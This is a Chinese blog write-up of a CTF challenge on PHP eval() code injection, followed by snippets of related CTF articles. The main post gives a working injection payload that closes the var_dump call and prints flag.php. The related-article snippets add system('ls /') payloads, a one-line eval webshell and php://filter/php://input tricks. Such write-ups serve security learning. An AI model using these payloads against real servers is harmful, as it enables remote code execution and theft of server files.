CTF之路：关于PHP eval() 注入问题

最新推荐文章于 2024-07-09 17:21:49 发布

zw05011

最新推荐文章于 2024-07-09 17:21:49 发布

阅读量4.9k

点赞数 1

分类专栏：知识点文章标签： php CTF web安全

本文链接：https://blog.csdn.net/zw05011/article/details/122284295

版权

知识点专栏收录该内容

19 篇文章 2 订阅

订阅专栏

该博客讨论了一个PHP代码注入问题，通过`eval()`函数的使用，展示了如何利用`$_REQUEST`变量来构造参数，读取并打印了`flag.php`文件的内容。解题过程中提到了利用`GET`方法构造注入，以及`var_dump()`和`print_r()`函数的使用来获取和展示文件信息。

摘要由CSDN通过智能技术生成

题目

<?php
    include "flag.php";
    $a = @$_REQUEST['hello'];
    eval( "var_dump($a);");
    show_source(__FILE__);
?>

关键函数

include()，引用文件，说明flag.php在同一文件夹下。

$_REQUEST[ ]等同于$_GET + $_POST，都可以用。

eval()能将字符串按PHP代码执行，这里是常用的的PHP注入点。（题眼在这里）

var_dump()显示表达式的类型和值，可以递归展开数组。

show_source()高亮文件，这里没啥用。

解题思路

用GET方法传参构造注入:

/?hello=1);print_r(file("flag.php"));//

/?hello=1);闭合括号

file("flag.php")提取文件内容为字符数组（一行为一个字符串）

print_r()逐行打印

结果

执行后得到：

int(1) Array ( [0] => $flag = 'Too Young Too Simple'; [2] => # echo $flag; [3] => # flag{1a9d50b65537a21bd484ee4a7e8a83b0}; [4] => ?> )

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

zw05011

关注关注

1
点赞
踩
6

收藏

觉得还不错? 一键收藏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

专栏目录

php eval ctf,浅谈CTF中命令执行与绕过的小技巧

weixin_39758618的博客

03-16

1420

*本文原创作者：pupiles，本文属FreeBuf原创奖励计划，未经许可禁止转载缘起lemon师傅在安全客里发表的一篇文章，总结的很详细，学到了很多姿势。但是在此我还想画蛇添足的做一些补充及解释。补充一下命令执行的漏洞。空格绕过< 符号%09 符号需要php环境，这里就不搭建啦，见谅)$IFS$9 符号${IFS} 符号这里解释一下${IFS},$IFS,$IFS$9的区别，首先$IFS在...

ctf (easy_eval)

Glacier_Mount的博客

07-02

1788

反序列化、redis

参与评论您还未登录，请先登录后发表或查看评论

西瓜杯CTF(1)

最新发布

qq_63217130的博客

07-09

716

下班之前写了两个题，后面继续发。

CTF中PHP相关题目考点总结（二）

HBohan的博客

02-16

3078

介绍本篇文章主要总结了我在写ctfshow题目中遇到的关于PHP的考点。因为只总结知识点和考点会比较空洞，也不容易理解，所以我都是通过题目来总结考点，这样的话比较容易理解。 PHP特性相关考点一、考点：php正则表达式的匹配模式差异。例题： show_source(__FILE__); include('flag.php'); $a=$_GET['cmd']; if(preg_match('/^php$/im', $a)){ #/i表示不区分大小写，/m表示多行匹配 i.

CTFHUB RCE-----eval执行

winofkill的博客

12-11

1696

首先进入题目我们先了解一下php当中eval()函数的作用 eval()函数中的eval是evaluate的简称，这个函数的作用就是把一段字符串当作PHP语句来执行。比如说eval($_REQUEST["cmd"]) $_REQUEST[]是接收数据用的,而其中的cmd 就是其中的数据进入题目 cmd是其中的参数，我们就把命令赋给cmd,我们先显示一下网页的根目录 ?cmd=system("ls "); 接着我们看上一级目录 ?cmd=system("ls /")..

ctf 文件包含

weixin_45942044的博客

03-28

285

一、eval() 函数一句话木马 <?php eval($_post[0]);?> eval()函数作用：将函数内的字符串当作代码来执行使用蚁剑连接一句话木马，需要输入密码，密码值为post[]中的值。二、通过php://filter获取flag ?php://filter/read=convert.base64-encode/resouce=flag.php 三、通过php://input获取shell ?php://input 在hackbar的post里写入&lt

CTF之eval

qq_74263993的博客

04-27

708

_REQUEST变量是一个关联数组，它的键是表单元素的名称，值是用户输入的数据。通过$_REQUEST变量，可以访问表单中所有输入字段的值，不论它们是使用GET、POST还是COOKIE方法提交的。在PHP中，$_REQUEST是一个超全局变量，用于收集HTML表单提交的数据。如果代码中存在解析错误，则 eval() 函数返回 false。hello=show_source('flag.php')该字符串必须是合法的 PHP 代码，且必须以分号结尾。

ctf php sql注入,【CTF-Web Learning 1】0x01 SQL注入之宽字节注入

weixin_36335651的博客

03-17

376

0x01 前言准备系统梳理和总结提高这一年所学的关于Web方面东西，如有问题欢迎指点。在计算机中，字符的表示与存储都离不开编码。例如ASCII，utf-8，gbk2312等。通常字符的表示都只需1字节。但也有如gbk2312这种需要2字节来表示的编码格式，这种我们称之为宽字节。所谓宽字节注入，可能存在于以gbk编码存储数据的sql数据库中。在实际站点中已经比较少见(常见于学校远古破站)，而且修复方...

php eval ctf,ctfhub技能树_web_RCE之eval、文件包含

weixin_34377697的博客

03-16

1019

这次我们来看看RCE(远程代码/命令执行)吧。由于篇幅限制，这篇文章不包含命令注入，命令注入我会在另一篇文章中详细的记录。eval执行打开题目，可以看到网页的源代码通过代码可以看到，这就是典型的web后门，配置中国蚁剑进入后台，获取flag文件包含看看代码：strpos(string,find,start) 函数查找字符串在另一字符串中第一次出现的位置参数描述string必需。规定要搜索的字符串。...

eval-Bugku CTF

m0_56859693的博客

09-05

1501

今天在bugku刷到了一道基础题，感觉考察的很全面。源代码如下第一行 include是将flag.php包含在页面代码中，也不难推测flag在flag.php中第二行 $_REQUEST可以将用户传入的hello传给服务器第三行分两个部分：eval和var_dump var_dump即把输入的hello作为字符串string输出 eval则可以把字符串当作php代码执行把hello赋值为system("ls") 发现包含flag.php和index.php ...

PHP代码注入详解

Zeker62的博客

08-16

5359

PHP代码注入的原理和解析 PHP代码注入靠的是RCE，即远程代码执行。指应用程序过滤不严，hacker可以将代码注入到服务器进行远程的执行。危害和SSRF相似，通过这个漏洞可以操控服务器的动作。最典型的就是一句话木马。 PHP代码漏洞注入的两个要素：程序中含有可执行的PHP代码函数传入第一点的参数，客户端可控，直接修改或者影响下面将对PHP相关函数和语句以及注入方法进行解释 eval（） eval()函数在很多语言中都有，比如Python、PHP。 eval函数的作用是将字符串作为PHP语

【愚公系列】2024年03月《CTF实战：从入门到提升》 010-Web安全入门（PHP代码执行漏洞）

热门推荐

时光隧道

03-28

5万+

PHP代码执行漏洞是一种常见的安全漏洞，也被称为远程代码执行（Remote Code Execution，RCE）漏洞。这种漏洞的发生通常是由于程序员在编写代码时未正确过滤用户输入，导致用户能够将恶意代码插入到应用程序中，然后被解释器执行。攻击者可以利用这种漏洞执行任意代码，从而获取系统权限、窃取数据或者对系统进行进一步的攻击。未过滤用户输入：开发者在使用用户输入时必须进行严格的输入验证和过滤，避免直接将用户输入作为代码执行。eval() 和 exec() 函数。

mysql注入ctf_CTF考点总结-sql注入

weixin_36488760的博客

01-28

1117

php后台扫描,CTF-WEB：网页后台扫描

weixin_42629671的博客

03-11

1479

目录后台扫描在拿到一个网页之后除了打开 F12 和抓包以外，还可以考虑扫一下后台，看一下有没有类似管理员页面、备份文件泄露和其他文件等。所谓扫描后台就是扫描站点的目录下还有哪些页面可以访问，可以使用御剑工具来做。御剑后台扫描是 T00LS 大牛的作品，可以用于扫描后台，同时这也为程序开发人员增加了难度，需要对的后台目录结构进行优化。御剑的用法很简单，在左下角添加需要扫描后台的域名，然后在右上角选择...

【愚公系列】2024年03月《CTF实战：从入门到提升》 011-Web安全入门（PHP反序列化漏洞）

时光隧道

03-30

5万+

PHP是一种广泛使用的开源服务器端脚本语言，它支持面向对象的编程范式。在PHP中，类和对象是用于封装数据与功能的核心组件，它们使得代码更加模块化、易于管理和扩展。在处理对象持久化——即在不同会话或不同请求之间保存对象状态的过程中，序列化和反序列化是两个非常重要的概念。反序列化漏洞通常发生在不安全地反序列化用户提供的数据时。代码执行：攻击者可能会注入恶意对象，当这个对象被反序列化时，它可能会触发任意代码执行。对象注入：通过构造特殊的序列化数据，攻击者可能会在应用程序上下文中创建不正当的对象实例。

20210221CTF小记之bugkuCTF冬至红包（短标签绕过echo、eval代码注入漏洞、$$绕过特定字符限制）

qq_45290991的博客

02-22

2345

今天做了一道很恶心的题目，话不多说，先上结果图：我们先来分析代码：当没有用GET方法传入flag时，会显示Click here的链接。点击链接会用GET方法传入一串字符串$exam，后面是当前时间的一串sha1哈希值。判断传入的flag长度与$exam是否相同，不同则显示长度不允许第二个判断过滤了一大堆第三个判断传入flag的值等于flag值的哈希值，正确就输出flag。用的是严格的三个等号的比较，我们flag都不知道，哈希值更不可能知道了，== 但容易发现此处存在任意代码.

CTF/CTF练习平台-本地包含【eval函数闭合及代码段的理解】

Sp4rkW的博客

08-21

4万+

原题内容：地址：http://120.24.86.145:8003/ 怎么说呢，难其实也不难，还是基本知识点掌握不足吧，写个wp记录下自己学习到的知识点 <?php include "flag.php"; $a = @$_REQUEST['hello']; eval( "var_dump($a);"); show_source(_...

ctf web方向与php学习记录5之eval()初见

这周末在做梦的博客

08-22

3107

由于bugku的本地包含无法打开，故找了其他人解题的过程以供学习。 https://www.cnblogs.com/0yst3r-2046/p/11062755.html 在本次学习中我将我学习的相关的原理和知识分享给大家，如下。一，初见eval，智商开始下线 eval()函数中的eval是evaluate的简称，这个函数的作用就是把一段字符串当作PHP语句来执行，一般情况下不建议使用容易被黑客利用。（1）定义和用法 eval() 函数把字符串按照 PHP 代码来计算。该字符串必须是是完整，合法的PH

CTF练习题[WEB]-eval

weixin_45246254的博客

10-11

3585

https://ctf.bugku.com/challenges/detail/id/75.html?page=4 拿到题目如下此题是php相关 var_dump函数打印a变量 <?php include "flag.php"; ## 引入flag.php $a = @$_REQUEST['hello']; ##a接收hello变量 eval( "var_dump($a);"); ##var_dump打印a变量 show_source(__FILE__)

这是一道ctf比赛web方向的题目 <?php highlight_file(__FILE__); eval($_POST[1]);

05-13

这是一道非常危险的题目，因为它允许用户执行任意的 PHP 代码。这样的代码容易被黑客利用来攻击服务器或者窃取用户的敏感信息。如果您不确定您的代码是否安全，强烈建议不要在生产环境中使用。这段代码会显示当前文件的源代码，并且允许用户通过 `$_POST[1]` 参数执行任意的 PHP 代码。这意味着黑客可以通过发送恶意的 POST 请求来执行任意的 PHP 代码，从而控制服务器。为了保障网站的安全，应该避免在生产环境中使用 `eval` 函数。如果必须使用 `eval` 函数，应该对用户输入进行严格的过滤和验证，以确保输入的代码不会执行危险的操作。